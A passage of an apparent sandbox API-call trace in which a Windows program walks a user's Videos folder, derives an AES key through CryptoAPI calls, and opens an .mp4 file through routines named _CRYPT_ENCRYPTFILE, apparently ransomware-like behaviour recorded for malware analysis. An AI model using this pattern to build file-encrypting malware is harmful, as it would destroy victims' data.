HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="paZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.349] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.349] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0199.350] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.350] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.350] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.350] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.350] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.350] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.350] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.375] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a38ea0, ftCreationTime.dwHighDateTime=0x1d5e37a, ftLastAccessTime.dwLowDateTime=0x39e54bc0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x39e54bc0, ftLastWriteTime.dwHighDateTime=0x1d5deab, nFileSizeHigh=0x0, nFileSizeLow=0x28d3, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="gUuRkOGgEOvL1Ts9uT.mp4", cAlternateFileName="GUURKO~1.MP4")) returned 0x90ae18 [0199.375] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0199.375] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.375] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.375] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.375] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0199.375] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.375] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0199.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.376] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0199.376] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.376] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.376] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.376] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0199.377] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.377] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0199.378] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.378] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.378] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0199.378] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.378] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.378] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.378] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.378] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.378] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.378] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.378] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.378] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.378] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.378] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.379] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.379] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0199.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.379] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.379] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.379] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.379] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.379] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.379] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.379] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.379] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.379] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.379] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.379] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.379] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.379] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.379] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.380] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0199.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.380] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0199.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.380] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.380] CryptHashData (hHash=0x90af58, pbData=0x8df140, dwDataLen=0x19, dwFlags=0x1) returned 1 [0199.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.380] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.380] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.380] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.381] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0199.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.381] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0199.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.381] CryptDestroyHash (hHash=0x90af58) returned 1 [0199.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.381] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.381] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.382] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.382] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\guurkoggeovl1ts9ut.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, 